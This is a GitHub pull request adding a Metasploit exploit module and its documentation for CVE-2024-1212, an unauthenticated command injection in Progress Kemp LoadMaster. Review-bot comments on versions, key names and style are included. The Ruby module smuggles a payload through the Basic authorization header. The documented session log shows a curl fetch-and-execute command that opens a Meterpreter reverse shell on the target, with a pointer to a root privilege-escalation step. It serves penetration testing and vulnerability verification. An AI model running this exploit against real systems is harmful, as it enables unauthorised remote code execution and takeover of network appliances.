Progress LoadMaster unauthenticated command injection module CVE-2024-1212 #18972
Merged: 6 commits merged into rapid7:master from DaveYesland:module/progress_kemp_loadmaster_unauth_cmd_injection on Apr 26, 2024
e32d05e  Add module and docs for CVE-2024-1212  (DaveYesland)
1a8233d  msftidy cleanup  (DaveYesland)
409f0e4  Remove Priv Esc to add it to another module and update it to only run…  (bwatters-r7)
c10bde9  Merge branch 'rapid7:master' into module/progress_kemp_loadmaster_una…  (DaveYesland)
a362440  Merge pull request #1 from bwatters-r7/update-18972  (DaveYesland)
02c3115  Add vulnerable versions and fix indention  (bwatters-r7)
Filter by extension
Conversations
Failed to load comments.
Jump to
Jump to file
Failed to load files.
Diff view
Diff view
There are no files selected for viewing
97 changes: 97 additions & 0 deletions
...ion/modules/exploit/linux/http/progress_kemp_loadmaster_unauth_cmd_injection.md
@@ -0,0 +1,97 @@ | ||
## Vulnerable Application | ||
CVE-2024-1212: Progress Kemp LoadMaster Unauthenticated Command Injection | ||
|
||
For more details on the vulnerability: | ||
https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/ | ||
|
||
https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212 | ||
|
||
A trial VM which the exploit should work against out of the box can be downloaded from: | ||
https://sso.kemptechnologies.com/register/kemp/vlm | ||
|
||
The AWS marketplace also has free trials which can be used. These require the "session management" to be enabled in order for the exploit to work. Since by default the admin WUI is behind basic auth. | ||
https://aws.amazon.com/marketplace/pp/prodview-kgh3dsfk7qcnw | ||
|
||
## Verification Steps | ||
1. Install the application | ||
1. Start msfconsole | ||
1. Do: `use exploits/linux/http/progress_kemp_loadmaster_unauth_cmd_injection` | ||
1. Do: `set RHOSTS <target loadmaster>` | ||
1. Do: `set RPORT <port loadmaster is running on>` | ||
1. Do: `set LHOST <your host IP>` | ||
1. Do: `run` | ||
1. You should get a shell as the `bal` user. | ||
1. (Optional) use the module `exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024` to gain root privileges. | ||
1. (Optional) use the script `run_progress_kemp_loadmaster_sudo_priv_esc_2024.rc` to automatically run the above module. | ||
|
||
## Scenarios | ||
|
||
### LoadMaster 7.2.59.0.22007 | ||
|
||
``` msf | ||
msf6 exploit(linux/http/progress_kemp_loadmaster_unauth_cmd_injection) > show options | ||
|
||
Module options (exploit/linux/http/progress_kemp_loadmaster_unauth_cmd_injection): | ||
|
||
Name Current Setting Required Description | ||
---- --------------- -------- ----------- | ||
Proxies no A proxy chain of format type:host:port[,type:host:port][...] | ||
RHOSTS 10.5.134.141 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met | ||
asploit.html | ||
RPORT 443 yes The target port (TCP) | ||
SSL true no Negotiate SSL/TLS for outgoing connections | ||
TARGETURI / yes The URI path to LoadMaster | ||
VHOST no HTTP server virtual host | ||
|
||
|
||
Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp): | ||
|
||
Name Current Setting Required Description | ||
---- --------------- -------- ----------- | ||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) | ||
FETCH_DELETE false yes Attempt to delete the binary after execution | ||
FETCH_FILENAME GyzwtIbxq no Name to use on remote system when storing payload; cannot contain spaces or slash | ||
es | ||
FETCH_SRVHOST no Local IP to use for serving payload | ||
FETCH_SRVPORT 8080 yes Local port to use for serving payload | ||
FETCH_URIPATH no Local URI to use for serving payload | ||
FETCH_WRITABLE_DIR /tmp/ yes Remote writable dir to store payload; cannot contain spaces | ||
LHOST 10.5.135.201 yes The listen address (an interface may be specified) | ||
LPORT 4444 yes The listen port | ||
|
||
|
||
Exploit target: | ||
|
||
Id Name | ||
-- ---- | ||
0 Automatic | ||
|
||
|
||
|
||
View the full module info with the info, or info -d command. | ||
|
||
msf6 exploit(linux/http/progress_kemp_loadmaster_unauth_cmd_injection) > run | ||
|
||
[*] Command to run on remote host: curl -so /tmp/LlipoMVy http://10.5.135.201:8080/RByzlSnTzclKDpvXskXIrg; chmod +x /tmp/LlipoMVy; /tmp/LlipoMVy & | ||
[*] Fetch handler listening on 10.5.135.201:8080 | ||
[*] HTTP server started | ||
[*] Adding resource /RByzlSnTzclKDpvXskXIrg | ||
[*] Started reverse TCP handler on 10.5.135.201:4444 | ||
[*] Running automatic check ("set AutoCheck false" to disable) | ||
[*] Checking if 10.5.134.141:443 is vulnerable... | ||
[+] The target is vulnerable. | ||
[*] Sending payload... | ||
[*] Client 10.5.134.141 requested /RByzlSnTzclKDpvXskXIrg | ||
[*] Sending payload to 10.5.134.141 (curl/7.77.0) | ||
[+] Now background this session with "bg" and then run "resource run_progress_kemp_loadmaster_sudo_priv_esc_2024.rc" to get a root shell | ||
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.134.141:29264) at 2024-04-12 17:08:57 -0500 | ||
|
||
meterpreter > sysinfo | ||
Computer : 10.5.134.141 | ||
OS : SuSE 7.2 (Linux 4.14.137) | ||
Architecture : x64 | ||
BuildTuple : x86_64-linux-musl | ||
Meterpreter : x64/linux | ||
meterpreter > getuid | ||
Server username: bal | ||
``` |
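Review bot: the Vulnerable Application section gives no affected or fixed version range; the scenario is against 7.2.59.0.22007, but a reader needs the vulnerable and patched LoadMaster versions (the linked vendor advisory is the place to cite them) to know what this module applies to. Two smaller points: the verification steps say `use exploits/linux/http/progress_kemp_loadmaster_unauth_cmd_injection` while the msfconsole prompt in the scenario shows the module as `exploit(linux/http/...)`, so use the canonical `exploit/` reference name in that step; and the two optional steps point at `exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024` and `run_progress_kemp_loadmaster_sudo_priv_esc_2024.rc`, neither of which is in this changeset, so either land them first or state in the docs that they ship separately. Also, "Since by default the admin WUI is behind basic auth." is a sentence fragment; fold it into the preceding sentence, e.g. "These require session management to be enabled for the exploit to work, since by default the admin WUI is behind basic auth."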
131 changes: 131 additions & 0 deletions
modules/exploits/linux/http/progress_kemp_loadmaster_unauth_cmd_injection.rb
@@ -0,0 +1,131 @@ | ||
## | ||
# This module requires Metasploit: https://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Exploit::Remote | ||
Rank = ExcellentRanking | ||
|
||
include Msf::Exploit::Remote::HttpClient | ||
prepend Msf::Exploit::Remote::AutoCheck | ||
def flag_file | ||
return @flag_file unless @flag_file.nil? | ||
|
||
@flag_file = '/tmp/' + Rex::Text.rand_text_alpha(5) | ||
end | ||
|
||
def initialize(info = {}) | ||
super( | ||
update_info( | ||
info, | ||
'Name' => 'Kemp LoadMaster Unauthenticated Command Injection', | ||
'Description' => %q{ | ||
This module exploits an unauthenticated command injection vulnerability in | ||
Progress Kemp LoadMaster in the authorization header. | ||
}, | ||
'Author' => [ | ||
'Dave Yesland with Rhino Security Labs', | ||
], | ||
'License' => MSF_LICENSE, | ||
'References' => [ | ||
['CVE', '2024-1212'], | ||
['URL', 'https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/'], | ||
['URL', 'https://kemptechnologies.com/kemp-load-balancers'] | ||
], | ||
'DisclosureDate' => '2024-03-19', | ||
'Notes' => { | ||
'Stability' => [ CRASH_SAFE ], | ||
'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK], | ||
'Reliability' => [ REPEATABLE_SESSION ] | ||
}, | ||
'Platform' => ['unix', 'linux'], | ||
'Arch' => [ARCH_CMD], | ||
'Privileged' => false, | ||
'Targets' => [ | ||
[ | ||
'Automatic', # Add logic to run the payload only once | ||
{ | ||
'Payload' => { | ||
'Prepend' => "[ -f #{flag_file} ] || ( touch #{flag_file}; (sleep 60; rm #{flag_file})& ", | ||
'Append' => ')', | ||
'BadChars' => "\x3a\x27" | ||
} | ||
} | ||
], | ||
[ | ||
'Do_Not_Prepend_Runonce_Code', # This will likely result in 2-3 sessions | ||
{ | ||
'Payload' => { | ||
'BadChars' => "\x3a\x27" | ||
} | ||
} | ||
] | ||
], | ||
'Default_target' => 0, | ||
'DefaultOptions' => { | ||
'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp', | ||
'FETCH_WRITABLE_DIR' => '/tmp/', | ||
'SSL' => true, | ||
'RPORT' => 443 | ||
} | ||
) | ||
) | ||
|
||
register_options([ | ||
OptString.new('TARGETURI', [true, 'The URI path to LoadMaster', '/']) | ||
]) | ||
end | ||
|
||
def exploit | ||
uri = normalize_uri(target_uri.path, 'access', 'set') | ||
|
||
vprint_status('Sending payload...') | ||
|
||
send_request_cgi({ | ||
'method' => 'GET', | ||
'uri' => uri, | ||
'vars_get' => | ||
{ | ||
'param' => 'enableapi', | ||
'value' => '1' | ||
}, | ||
This indentation seems like something rubocop should have complained about
||
'authorization' => basic_auth("';#{payload.encoded};echo '", Rex::Text.rand_text_alpha(rand(8..15))), | ||
'verify' => false | ||
}) | ||
end | ||
|
||
def on_new_session(client) | ||
super | ||
print_good('Now background this session with "bg" and then run "resource run_progress_kemp_loadmaster_sudo_priv_esc_2024.rc" to get a root shell') | ||
end | ||
|
||
def check | ||
print_status("Checking if #{peer} is vulnerable...") | ||
|
||
uri = normalize_uri(target_uri.path, 'access', 'set') | ||
|
||
res = send_request_cgi({ | ||
'method' => 'GET', | ||
'uri' => uri, | ||
'vars_get' => { | ||
'param' => 'enableapi', | ||
'value' => '1' | ||
}, | ||
'authorization' => basic_auth("'", Rex::Text.rand_text_alpha(rand(8..15))), | ||
'verify' => false | ||
}) | ||
|
||
# No response from server | ||
unless res | ||
return CheckCode::Unknown | ||
end | ||
|
||
# Check for specific error pattern in headers or body to confirm vulnerability | ||
if res.headers.to_s.include?('unexpected EOF while looking for matching') || res.body.include?('unexpected EOF while looking for matching') | ||
return CheckCode::Vulnerable | ||
else | ||
return CheckCode::Safe | ||
end | ||
end | ||
|
||
end |
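Review bot: `'Default_target' => 0` is not the key the framework reads; the info hash key is `'DefaultTarget'`, so as written it is silently ignored (harmless only because the Automatic target is the first entry). Also, `check` is active rather than passive: it injects a lone `'` through `basic_auth` and keys on the shell's `unexpected EOF while looking for matching` error, so running it executes a malformed command on the target and leaves the same IOC_IN_LOGS artifacts the Notes declare for the exploit; add a comment above `check` saying so, so operators know AutoCheck is not a no-op. Smaller points: document why `BadChars` is `"\x3a\x27"` (the colon separates user and password in the Basic header and the single quote closes the injection context in the payload); the `print_good` in `on_new_session` references `run_progress_kemp_loadmaster_sudo_priv_esc_2024.rc`, which is not part of this changeset; and the `'vars_get' =>` with its opening brace on the next line in `exploit` is the indentation the inline comment flagged, so write it as `'vars_get' => {` the way `check` already does.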
Just adding affected / patched version info to the Description.